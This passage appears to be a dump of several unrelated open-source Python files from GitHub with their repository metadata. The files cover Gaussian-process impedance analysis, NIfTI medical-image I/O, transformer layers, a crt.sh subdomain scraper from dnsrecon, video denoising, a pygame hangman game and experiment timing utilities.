np.dot(np.diag(Sigma_mat), V))\n\n A_nPD = (B + H) / 2\n A_symm = (A_nPD + A_nPD.T) / 2\n\n k = 1\n I = np.eye(A_symm.shape[0])\n\n while not is_PD(A_symm):\n eps = np.spacing(la.norm(A_symm))\n\n # MATLAB's 'chol' accepts matrices with eigenvalue = 0, numpy does not not. \n # So where the matlab implementation uses 'eps(mineig)', we use the above definition.\n\n min_eig = min(0, np.min(np.real(np.linalg.eigvals(A_symm))))\n A_symm += I * (-min_eig * k**2 + eps)\n k += 1\n\n return A_symm\n\n \n# calculate the negative marginal log-likelihood (NMLL)\ndef NMLL_fct(theta, A, Z_exp_re_im, N_freqs, log_tau_vec):\n\n # load the value of the parameters\n sigma_n = theta[0]\n sigma_R = theta[1]\n sigma_f = theta[2]\n ell = theta[3]\n\n # number of N\n N_taus = log_tau_vec.size \n\n # Gamma\n Gamma = np.zeros((N_taus+1, N_taus+1))\n Gamma[0,0] = sigma_R**2\n # compute the K matrix\n K = compute_K(log_tau_vec, sigma_f, ell)\n Gamma[1:, 1:] = K\n\n # put together the Gamma matrix\n Psi = A@(Gamma@A.T)+(sigma_n**2)*np.eye(2*N_freqs)\n Psi = 0.5*(Psi + Psi.T) # symmetrize\n \n # Cholesky decomposition of Psi\n if(is_PD(Psi)==False):\n Psi = nearest_PD(Psi)\n else:\n Psi = Psi\n \n L = np.linalg.cholesky(Psi)\n \n # solve for alpha\n alpha = np.linalg.solve(L, Z_exp_re_im)\n alpha = np.linalg.solve(L.T, alpha)\n\n return 0.5*np.dot(Z_exp_re_im,alpha) + np.sum(np.log(np.diag(L)))\n\ndef NMLL_L_fct(theta, A, Z_exp_re_im, N_freqs, log_tau_vec):\n\n # load the value of the parameters\n sigma_n = theta[0]\n sigma_L = theta[1]\n sigma_R = theta[2]\n sigma_f = theta[3]\n ell = theta[4]\n\n # number of N\n N_taus = log_tau_vec.size\n\n # Gamma\n Gamma = np.zeros((N_taus+2, N_taus+2))\n Gamma[0,0] = sigma_L**2\n Gamma[1,1] = sigma_R**2\n # compute the K matrix\n K = compute_K(log_tau_vec, sigma_f, ell)\n Gamma[2:, 2:] = K\n\n # put together the Gamma matrix\n Psi = A@(Gamma@A.T)+(sigma_n**2)*np.eye(2*N_freqs)\n Psi = 0.5*(Psi + Psi.T) # symmetrize\n \n if(is_PD(Psi)==False):\n Psi = nearest_PD(Psi)\n else:\n Psi = Psi\n \n # Cholesky decomposition of Psi\n L = np.linalg.cholesky(Psi)\n \n # solve for alpha\n alpha = np.linalg.solve(L, Z_exp_re_im)\n alpha = np.linalg.solve(L.T, alpha)\n\n return 0.5*np.dot(Z_exp_re_im,alpha) + np.sum(np.log(np.diag(L)))\n\ndef generate_tmg(F, g, M, mu_r, initial_X, cov=True, L=1):\n\n \"\"\"\n Implementation of the algorithm described in http://arxiv.org/abs/1208.4118\n Author: Ari Pakman\n\n Returns samples from a d-dimensional Gaussian with constraints given by F*X+g >0 \n If cov == true\n then M is the covariance and the mean is mu = mu_r \n if cov== false \n then M is the precision matrix and the log-density is -1/2 X'*M*X + r'*X\n\n Input\n F: m x d array\n g: m x 1 array \n M d x d array, must be symmmetric and definite positive\n mu_r d x 1 array \n cov: see explanation above \n L: number of samples desired\n initial_X d x 1 array. Must satisfy the constraint.\n\n Output\n Xs: d x L array, each column is a sample\n\n \"\"\"\n\n # sanity check\n m = g.shape[0]\n if F.shape[0] != m:\n print(\"Error: constraint dimensions do not match\")\n return\n\n # using covariance matrix\n if cov:\n mu = mu_r\n g = g + F@mu\n \n ## Nearest Positive Definite \n if(is_PD(M)==False):\n M = nearest_PD(M)\n else:\n M = M\n \n R = cholesky(M)\n R = R.T #change the lower matrix to upper matrix\n F = F@R.T\n initial_X = initial_X -mu\n initial_X = np.linalg.solve(R.T, initial_X)\n # using precision matrix\n else:\n r = mu_r\n # Nearest Positive Definite \n if(is_PD(M)==False):\n M = nearest_PD(M)\n else:\n M = M\n R = cholesky(M)\n R = R.T #change the lower matrix to upper matrix\n mu = np.linalg.solve(R, np.linalg.solve(R.T, r))\n g = g + F@mu\n F = np.linalg.solve(R, F)\n initial_X = initial_X - mu\n initial_X = R@initial_X\n\n d = initial_X.shape[0] # dimension of mean vector; each sample must be of this dimension\n bounce_count = 0\n nearzero = 1E-12\n\n # more for debugging purposes\n if (F@initial_X + g).any() < 0:\n print(\"Error: inconsistent initial condition\")\n return\n\n # squared Euclidean norm of constraint matrix columns\n F2 = np.sum(np.square(F), axis=1)\n Ft = F.T\n\n last_X = initial_X\n Xs = np.zeros((d,L))\n Xs[:,0] = initial_X\n\n i=2\n\n # generate samples\n while i <=L:\n \n if i%1000 == 0:\n print('Current sample number',i,'/', L)\n \n stop = False\n j = -1\n # generate inital velocity from normal distribution\n V0 = randn(d)\n\n X = last_X\n T = pi/2\n tt = 0\n\n while True:\n a = np.real(V0)\n b = X\n\n fa = F@a\n fb = F@b\n\n U = np.sqrt(np.square(fa) + np.square(fb))\n # print(U.shape)\n\n # has to be arctan2 not arctan\n phi = np.arctan2(-fa, fb)\n\n # find the locations where the constraints were hit\n pn = np.array(np.abs(np.divide(g, U))<=1)\n \n if pn.any():\n inds = np.where(pn)[0]\n phn = phi[pn]\n t1 = -1.0*phn + np.arccos(np.divide(-1.0*g[pn], U[pn]))\n \n # if there was a previous reflection (j > -1)\n # and there is a potential reflection at the sample plane\n # make sure that a new reflection at j is not found because of numerical error\n if j > -1:\n if pn[j] == 1:\n temp = np.cumsum(pn)\n indj = temp[j]-1 # we changed this line\n tt1 = t1[indj]\n \n if np.abs(tt1) < nearzero or np.abs(tt1 - pi) < nearzero:\n # print(t1[indj])\n t1[indj] = inf\n \n mt = np.min(t1)\n m_ind = np.argmin(t1)\n # update j\n j = inds[m_ind]\n \n else:\n mt = T\n \n # update travel time\n tt = tt + mt\n\n if tt >= T:\n mt = mt- (tt - T)\n stop = True\n\n # print(a)\n # update position and velocity\n X = a*np.sin(mt) + b*np.cos(mt)\n V = a*np.cos(mt) - b*np.sin(mt)\n\n if stop:\n break\n \n # update new velocity\n qj = F[j,:]@V/F2[j]\n V0 = V - 2*qj*Ft[:,j]\n \n bounce_count += 1\n\n if (F@X +g).all() > 0:\n Xs[:,i-1] = X\n last_X = X\n i = i+1\n\n else:\n print('hmc reject') \n\n # need to transform back to unwhitened frame\n if cov:\n Xs = R.T@Xs + repmat(mu.reshape(mu.shape[0],1),1,L)\n else:\n Xs = np.linalg.solve(R, Xs) + repmat(mu.reshape(mu.shape[0],1),1,L)\n\n # convert back to array\n return Xs","repo_name":"ciuccislab/fGP-DRT","sub_path":"tutorials/finite_GP_DRT.py","file_name":"finite_GP_DRT.py","file_ext":"py","file_size_in_byte":12738,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"914022818","text":"from __future__ import division, print_function\n\nimport os\nimport logging\nimport traceback\n\nimport nibabel as nib\nimport numpy as np\n\nfrom .qpdata import DataGrid, QpData, NumpyData, Metadata\n\nLOG = logging.getLogger(__name__)\n\nQP_NIFTI_EXTENSION_CODE = 42\n\nclass NiftiData(QpData):\n \"\"\"\n QpData from a Nifti file\n \"\"\"\n def __init__(self, fname):\n nii = nib.load(fname)\n shape = list(nii.shape)\n while len(shape) < 3:\n shape.append(1)\n\n if len(shape) > 3:\n nvols = shape[3]\n else:\n nvols = 1\n\n self.rawdata = None\n self.voldata = None\n self.nifti_header = nii.header\n metadata = None\n for ext in self.nifti_header.extensions:\n if ext.get_code() == QP_NIFTI_EXTENSION_CODE:\n import yaml\n LOG.debug(\"Found QP metadata: %s\", ext.get_content())\n try:\n yaml_data = yaml.safe_load(ext.get_content())\n LOG.debug(\"YAML data: %s\", yaml_data)\n if isinstance(yaml_data, Metadata):\n # Old style\n metadata = yaml_data\n else:\n # New style\n metadata = yaml_data[0][\"QpMetadata\"]\n LOG.debug(metadata)\n except:\n # Never fail to load a file just because of metadata\n LOG.warn(\"Failed to read Quantiphyse metadata\")\n LOG.warn(ext.get_content())\n traceback.print_exc()\n\n xyz_units, vol_units = \"mm\", None\n units = nii.header.get_xyzt_units()\n if units:\n xyz_units = units[0]\n if len(units) > 1:\n vol_units = units[1]\n\n vol_scale = 1.0\n zooms = nii.header.get_zooms()\n if zooms and len(zooms) > 3:\n vol_scale = zooms[3]\n\n grid = DataGrid(shape[:3], nii.header.get_best_affine(), units=xyz_units)\n QpData.__init__(self, fname, grid, nvols, vol_unit=vol_units, vol_scale=vol_scale, fname=fname, metadata=metadata)\n\n def raw(self):\n # NB: copy() converts data to an in-memory array instead of a numpy file memmap.\n # Appears to improve speed drastically as well as stop a bug with accessing the subset of the array\n # memmap has been designed to save space on ram by keeping the array on the disk but does\n # horrible things with performance, and analysis especially when the data is on the network.\n if self.rawdata is None:\n nii = nib.load(self.fname)\n #self.rawdata = nii.get_fdata().copy()\n self.rawdata = nii.get_fdata()\n self.rawdata = self._correct_dims(self.rawdata)\n\n self.voldata = None\n return self.rawdata\n \n def volume(self, vol, qpdata=False):\n vol = min(vol, self.nvols-1)\n if self.nvols == 1:\n ret = self.raw()\n elif self.rawdata is not None:\n ret = self.rawdata[:, :, :, vol]\n else:\n if self.voldata is None:\n self.voldata = [None,] * self.nvols\n if self.voldata[vol] is None:\n nii = nib.load(self.fname)\n self.voldata[vol] = self._correct_dims(nii.dataobj[..., vol])\n ret = self.voldata[vol]\n\n if qpdata:\n return NumpyData(ret, grid=self.grid, name=\"%s_vol_%i\" % (self.name, vol))\n else:\n return ret\n\n def _correct_dims(self, arr):\n while arr.ndim < 3:\n arr = np.expand_dims(arr, -1)\n\n if self.metadata.get(\"raw_2dt\", False) and arr.ndim == 3:\n # Single-slice, interpret 3rd dimension as time\n arr = np.expand_dims(arr, 2)\n\n if arr.ndim == 4 and arr.shape[3] == 1:\n arr = np.squeeze(arr, axis=-1)\n return arr\n\ndef save(data, fname, grid=None, outdir=\"\"):\n \"\"\"\n Save data to a file\n \n :param data: QpData instance\n :param fname: File name\n :param grid: If specified, grid to save the data on\n :param outdir: Optional output directory if fname is not absolute\n \"\"\"\n if grid is None:\n grid = data.grid\n arr = data.raw().copy()\n else:\n arr = data.resample(grid).raw().copy()\n \n if hasattr(data, \"nifti_header\"):\n header = data.nifti_header.copy()\n else:\n header = None\n\n img = nib.Nifti1Image(arr, grid.affine, header=header)\n img.update_header()\n if data.metadata:\n from quantiphyse.utils.batch import to_yaml\n yaml_metadata = to_yaml({\"QpMetadata\" : data.metadata})\n LOG.debug(\"Writing metadata: %s\", yaml_metadata)\n extensions = nib.nifti1.Nifti1Extensions([ext for ext in img.header.extensions if ext.get_code() != QP_NIFTI_EXTENSION_CODE])\n extensions.append(nib.nifti1.Nifti1Extension(QP_NIFTI_EXTENSION_CODE, yaml_metadata.encode('utf-8')))\n img.header.extensions = extensions\n\n if not fname:\n fname = data.name\n \n _, extension = os.path.splitext(fname)\n if extension == \"\":\n fname += \".nii\"\n \n if not os.path.isabs(fname):\n fname = os.path.join(outdir, fname)\n\n dirname = os.path.dirname(fname)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n LOG.debug(\"Saving %s as %s\", data.name, fname)\n img.to_filename(fname)\n data.fname = fname\n","repo_name":"physimals/quantiphyse","sub_path":"quantiphyse/data/nifti.py","file_name":"nifti.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"38788227443","text":"\"\"\"\nListing 3.30\n\nThis example uses map() to multiply the numbers in the range 0 through 4\nby 2\n\nThe repeat() iterator does not need to be explicitly limited, since\nmap() stops processing when any of its input ends, and the range()\nreturns only five elements\n\"\"\"\nimport itertools\n\n\ndef main():\n for i in map(\n lambda x, y: (x, y, x * y),\n itertools.repeat(2),\n range(5)\n ):\n print(f\"{i[0]:d} * {i[1]:d} = {i[2]:d}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/python3-standard-library-solutions","sub_path":"Chapter03/0030_itertools_repeat_map.py","file_name":"0030_itertools_repeat_map.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2641575715","text":"#!/usr/bin/env python2.7\nfrom app import test\nfrom app import yumbot\nfrom app import means_shift\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Add or remove recipes from the database. Set the number of recipes to add/remove from the database')\n parser.add_argument('--action', default='distance', type=str,\n help='action can be distance,test,kmeans, or meansshift. Distance allows you to add a set of ingredients broken up by a comma. Test saves the distance between all ingredients and stats. Kmeans creates kmeans clusters.')\n parser.add_argument('--ingredients', default='garlic,thyme', type=str,\n help='Ingredients separated by a comma')\n\n args = parser.parse_args()\n if args.action == 'distance':\n ingredients = args.ingredients.split(\",\")\n test.test_pca(ingredients, True)\n elif args.action == 'test':\n test.create_database_snapshot()\n elif args.action == 'kmeans':\n test.kmeans_test()\n elif args.action == 'meansshift':\n means_shift.mean_shift_test()\n elif args.action == 'yumbot':\n print(yumbot.get_random_recipe())","repo_name":"SrutiG/YumBot","sub_path":"test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42295500700","text":"import math\nimport logging\nfrom functools import partial\nfrom collections import OrderedDict\nfrom typing import Optional\nfrom itertools import repeat\nimport collections.abc\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\n\n\ndef _ntuple(n):\n def parse(x):\n if isinstance(x, collections.abc.Iterable) and not isinstance(x, str):\n return x\n return tuple(repeat(x, n))\n\n return parse\n\n\nto_1tuple = _ntuple(1)\nto_2tuple = _ntuple(2)\nto_3tuple = _ntuple(3)\nto_4tuple = _ntuple(4)\nto_ntuple = _ntuple\n\n\nclass Mlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, bias=True, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n bias = to_2tuple(bias)\n drop_probs = to_2tuple(drop)\n\n self.fc1 = nn.Linear(in_features, hidden_features, bias=bias[0])\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop_probs[0])\n self.fc2 = nn.Linear(hidden_features, out_features, bias=bias[1])\n self.drop2 = nn.Dropout(drop_probs[1])\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False, scale_by_keep: bool = True):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = x.new_empty(shape).bernoulli_(keep_prob)\n if keep_prob > 0.0 and scale_by_keep:\n random_tensor.div_(keep_prob)\n return x * random_tensor\n\n\nclass DropPath(nn.Module):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob: float = 0., scale_by_keep: bool = True):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n self.scale_by_keep = scale_by_keep\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training, self.scale_by_keep)\n\n def extra_repr(self):\n return f'drop_prob={round(self.drop_prob, 3):0.3f}'\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):\n super().__init__()\n assert dim % num_heads == 0, 'dim should be divisible by num_heads'\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass LayerScale(nn.Module):\n def __init__(self, dim, init_values=1e-5, inplace=False):\n super().__init__()\n self.inplace = inplace\n self.gamma = nn.Parameter(init_values * torch.ones(dim))\n\n def forward(self, x):\n return x.mul_(self.gamma) if self.inplace else x * self.gamma\n\n\nclass ParallelBlock(nn.Module):\n\n def __init__(\n self, dim, num_heads, num_parallel=2, mlp_ratio=4., qkv_bias=False, init_values=None,\n drop=0., attn_drop=0., drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.num_parallel = num_parallel\n self.attns = nn.ModuleList()\n self.ffns = nn.ModuleList()\n for _ in range(num_parallel):\n self.attns.append(nn.Sequential(OrderedDict([\n ('norm', norm_layer(dim)),\n ('attn', Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop)),\n ('ls', LayerScale(dim, init_values=init_values) if init_values else nn.Identity()),\n ('drop_path', DropPath(drop_path) if drop_path > 0. else nn.Identity())\n ])))\n self.ffns.append(nn.Sequential(OrderedDict([\n ('norm', norm_layer(dim)),\n ('mlp', Mlp(dim, hidden_features=int(dim * mlp_ratio), act_layer=act_layer, drop=drop)),\n ('ls', LayerScale(dim, init_values=init_values) if init_values else nn.Identity()),\n ('drop_path', DropPath(drop_path) if drop_path > 0. else nn.Identity())\n ])))\n\n def _forward_jit(self, x):\n x = x + torch.stack([attn(x) for attn in self.attns]).sum(dim=0)\n x = x + torch.stack([ffn(x) for ffn in self.ffns]).sum(dim=0)\n return x\n\n @torch.jit.ignore\n def _forward(self, x):\n x = x + sum(attn(x) for attn in self.attns)\n x = x + sum(ffn(x) for ffn in self.ffns)\n return x\n\n def forward(self, x):\n if torch.jit.is_scripting() or torch.jit.is_tracing():\n return self._forward_jit(x)\n else:\n return self._forward(x)\n","repo_name":"LL3RD/ACFormer","sub_path":"ssod/models/utils/transformer_utils.py","file_name":"transformer_utils.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"75053259345","text":"from lxml import etree\nfrom dnsrecon.lib.msf_print import *\n\n\nfrom urllib.request import urlopen, Request\nfrom urllib.error import URLError, HTTPError\n\n\ndef scrape_crtsh(dom):\n \"\"\"\n Function for enumerating subdomains by scraping crt.sh.\n \"\"\"\n results = []\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n }\n url = f\"https://crt.sh/?q=%25.{dom}\"\n\n req = Request(url=url, headers=headers)\n try:\n resp = urlopen(req, timeout=30)\n data = resp.read()\n except HTTPError as e:\n print_error(f'Bad http status from crt.sh: \"{e.code}\"')\n return results\n except URLError as e:\n print_error(f'Connection with crt.sh failed. Reason: \"{e.reason}\"')\n return results\n\n root = etree.HTML(data)\n tbl = root.xpath(\"//table/tr/td/table/tr/td[5]\")\n if len(tbl) < 1:\n print_error(\"Certificates for subdomains not found\")\n return results\n\n for ent in tbl:\n sub_dom = ent.text\n if not sub_dom.endswith(\".\" + dom):\n continue\n if sub_dom.startswith(\"*.\"):\n print_status(f\"\\t {sub_dom} wildcard\")\n continue\n if sub_dom not in results:\n results.append(sub_dom)\n\n return results\n","repo_name":"darkoperator/dnsrecon","sub_path":"dnsrecon/lib/crtenum.py","file_name":"crtenum.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":2365,"dataset":"github-code","pt":"48"} +{"seq_id":"23739947956","text":"from models.components import ResBlocks, D\nfrom pytorch_pwc.extract_flow import extract_flow_torch\nfrom pytorch_pwc.pwc import PWCNet\nimport torch\nimport torch.nn as nn\nfrom utils.warp import warp\n\nclass ForwardRNN(nn.Module):\n def __init__(self, img_channels=3, num_resblocks=6, num_channels=64):\n super(ForwardRNN, self).__init__()\n self.num_channels = num_channels\n self.pwcnet = PWCNet()\n self.forward_rnn = ResBlocks(input_channels=img_channels + img_channels + num_channels, num_resblocks=num_resblocks, num_channels=num_channels)\n self.d = D(in_channels=num_channels, mid_channels=num_channels, out_channels=img_channels)\n\n def trainable_parameters(self):\n return [{'params':self.forward_rnn.parameters()}, {'params':self.d.parameters()}]\n\n def forward(self, seqn, noise_level_map):\n N, T, C, H, W = seqn.shape\n seqdn = torch.empty_like(seqn)\n\n init_h = torch.zeros((N, self.num_channels, H, W), device=seqn.device)\n h = self.forward_rnn(torch.cat((seqn[:, 0], noise_level_map[:, 0], init_h), dim=1))\n seqdn[:, 0] = self.d(h)\n\n for i in range(1, T):\n flow = extract_flow_torch(self.pwcnet, seqn[:, i], seqn[:, i-1])\n aligned_h, _ = warp(h, flow)\n h = self.forward_rnn(torch.cat((seqn[:, i], noise_level_map[:, i], aligned_h), dim=1))\n seqdn[:, i] = self.d(h)\n\n return seqdn\n","repo_name":"nagejacob/FloRNN","sub_path":"models/forwardrnn.py","file_name":"forwardrnn.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"5218880854","text":"import pygame\n\npygame.init()\n\nWIDTH, HEIGHT=1600, 1200\nWIN=pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Hangman(French Revolution Edition)\")\nFPS=60\n\nYELLOW=(255,255,0)\nBLUE=(0,255,0)\nBLACK=(0,0,0)\nfont = pygame.font.SysFont(\"arial\", 50)\n\nbuttons=[]\nhang_pic=[pygame.image.load(\"Pictures/1.png\"),pygame.image.load(\"Pictures/2.png\"),pygame.image.load(\"Pictures/3.png\"),\n pygame.image.load(\"Pictures/4.png\"),pygame.image.load(\"Pictures/5.png\"),pygame.image.load(\"Pictures/6.png\"),\n pygame.image.load(\"Pictures/7.png\")]\n\nword=\"Hello\"\nhang=0\nguessed=[]\n\ndef check(guess):\n if(guess.upper() in word.upper()):\n return True\n return False\n\ndef getButton(x,y):\n global buttons\n for button in buttons:\n if x>=button[1]-50 and x<=button[1]+50:\n if y>=button[2]-50 and y<=button[2]+50:\n if button[4]:\n return button[5]\n return None\n\ndef get_output():\n global word\n output=''\n for i in word:\n found=False\n for j in guessed:\n if i.upper()==j.upper():\n output+=i+' '\n found=True\n if not found:\n output+='_ '\n return output\n\n\ndef draw_window():\n WIN.fill(YELLOW)\n for button in buttons:\n if button[4]:\n pygame.draw.circle(WIN,BLUE,(button[1],button[2]),button[3])\n letter = font.render(chr(button[5]), 1, BLACK)\n WIN.blit(letter,(button[1]-letter.get_width()//2,button[2]-letter.get_height()//2))\n WIN.blit(hang_pic[hang],(450,300))\n output=font.render(get_output(),1, BLACK)\n output_width=output.get_width()\n WIN.blit(output,((WIDTH//2-output_width//2),900))\n pygame.display.update()\n\ndef end(win=False):\n #pygame.time.delay(2000)\n if win==True:\n text=\"You win!\"\n else:\n text=\"You lose!\"\n WIN.fill(YELLOW)\n win_text=font.render(text,1,BLACK)\n WIN.blit(win_text, (WIDTH//2-win_text.get_width()//2,HEIGHT//2))\n pygame.display.update()\n pygame.time.delay(1000)\n pygame.quit()\n\ndef main():\n global hang\n run=True\n clock=pygame.time.Clock()\n for i in range(26):\n x=1500//13*(i%13+1)\n y=100+i//13*110\n buttons.append([BLUE,x,y,50,True,65+i])\n while run:\n clock.tick(FPS)\n draw_window()\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n run=False\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_ESCAPE:\n run=False\n if event.type==pygame.MOUSEBUTTONDOWN:\n x,y=event.pos\n if getButton(x,y)!=None:\n i=getButton(x,y)\n letter=chr(i)\n i-=65\n guessed.append(letter)\n buttons[i][4] = False\n if check(letter):\n if get_output().count('_')==0:\n end(True)\n else:\n if hang!=5:\n hang+=1\n else:\n end()\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xiangnongWu2233/LHPS_CodingClub_GroupProject_Python","sub_path":"Mini_Game(Demo created by Xiangnong)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12433544394","text":"\n\nainfo = []\nLeftBit = 16\nfor i in range(2, 15):\n\tsubnum = (2 ** i) - 2\n\tpcs = 2 ** (32 - (i + LeftBit)) - 2\n\tb = '1' * LeftBit + '1' * i + '0' * (32-(i+LeftBit))\n\tx = tuple(map(lambda x: int(x, 2), (b[0:8], b[8:16],b[16:24],b[24:32])))\n\tmask = \"%s.%s.%s.%s\" % x\n\tainfo.append((i,subnum,mask,pcs))\t\n\nfor row in ainfo:\n\tprint(\"\")\n\tfor item in row:\n\t\tprint(\"%s\" % item)\n\tprint(\"\")\n","repo_name":"dehuagit/mypython","sub_path":"ip/Bclass.py","file_name":"Bclass.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39704928341","text":"\"\"\"Utilities for keeping track of time in a task.\"\"\"\n\nfrom __future__ import division\nfrom PyQt5 import QtCore\nfrom axopy.messaging import Transmitter, TransmitterBase\n\n\nclass Counter(TransmitterBase):\n \"\"\"Counts to a given number then transmits a timeout event.\n\n Parameters\n ----------\n max_count : int\n Number of iterations to go through before transmitting the `timeout`\n event. Must be greater than 1.\n reset_on_timeout : bool, optional\n Specifies whether or not the timer should reset its count back to zero\n once the timeout event occurs. The default behavior is to reset.\n\n Attributes\n ----------\n count : int\n Current count.\n timeout : Transmitter\n Transmitted when ``max_count`` has been reached.\n\n Examples\n --------\n Basic usage:\n\n >>> from axopy.timing import Counter\n >>> timer = Counter(2)\n >>> timer.increment()\n >>> timer.count\n 1\n >>> timer.progress\n 0.5\n >>> timer.increment()\n >>> timer.count\n 0\n \"\"\"\n\n timeout = Transmitter()\n\n def __init__(self, max_count=1, reset_on_timeout=True):\n super(Counter, self).__init__()\n max_count = int(max_count)\n if max_count < 1:\n raise ValueError('max_count must be > 1')\n\n self.reset_on_timeout = reset_on_timeout\n\n self.max_count = max_count\n self.count = 0\n\n @property\n def progress(self):\n \"\"\"Progress toward timeout, from 0 to 1.\"\"\"\n return self.count / self.max_count\n\n def increment(self):\n \"\"\"Increment the counter.\n\n If `max_count` is reached, the ``timeout`` event is transmitted. If\n `reset_on_timeout` has been set to True (default), the timer is also\n reset.\n \"\"\"\n self.count += 1\n\n if self.count == self.max_count:\n if self.reset_on_timeout:\n self.reset()\n\n self.timeout.emit()\n\n def reset(self):\n \"\"\"Resets the count to 0 to start over.\"\"\"\n self.count = 0\n\n\nclass Timer(TransmitterBase):\n \"\"\"Real-time one-shot timer.\n\n This is useful in situations where you want to wait for some amount of time\n and locking the timing to data acquisition updates is not important. For\n example, inserting a waiting period between trials of a task can be done by\n connecting the ``timeout`` transmitter to your task's\n :meth:`~axopy.task.Task.next_trial` method.\n\n Parameters\n ----------\n duration : float\n Duration of the timer, in seconds.\n\n Attributes\n ----------\n timeout : Transmitter\n Transmitted when the timer has finished.\n \"\"\"\n\n timeout = Transmitter()\n\n def __init__(self, duration):\n super(Timer, self).__init__()\n self.duration = duration\n\n self._qtimer = QtCore.QTimer()\n self._qtimer.setInterval(int(1000*self.duration))\n self._qtimer.setSingleShot(True)\n self._qtimer.timeout.connect(self.timeout)\n\n def start(self):\n \"\"\"Start the timer.\"\"\"\n self._qtimer.start()\n\n def stop(self):\n \"\"\"Stop the timer.\n\n If you stop the timer early, the timeout event won't be transmitted.\n \"\"\"\n self._qtimer.stop()\n","repo_name":"axopy/axopy","sub_path":"axopy/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"2988470191","text":"# %% [markdown]\n\"\"\"\nThis is a notebook to compare high and low eccentric cells to see if there are notable differences via UMAP representation\n\"\"\"\n# %%\nimport sys\nsys.path.append('../scripts')\nimport pickle\nimport cellMorphHelper\nimport cellMorph\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nimport pandas as pd\nimport seaborn as sns\nimport random\n\nfrom skimage.measure import label, regionprops, regionprops_table\n# %%\nesamNeg = pickle.load(open('../results/TJ2201Split16/TJ2201Split16-E2.pickle',\"rb\"))\nesamPos = pickle.load(open('../results/TJ2201Split16/TJ2201Split16-D2.pickle',\"rb\"))\n\nesamNeg = cellMorphHelper.filterCells(esamNeg, confluencyDate=datetime.datetime(2022, 4, 8, 16, 0), color='red', edge=True)\nesamPos = cellMorphHelper.filterCells(esamPos, confluencyDate=datetime.datetime(2022, 4, 8, 16, 0), color='green', edge=True)\n\nesamNegOrig = 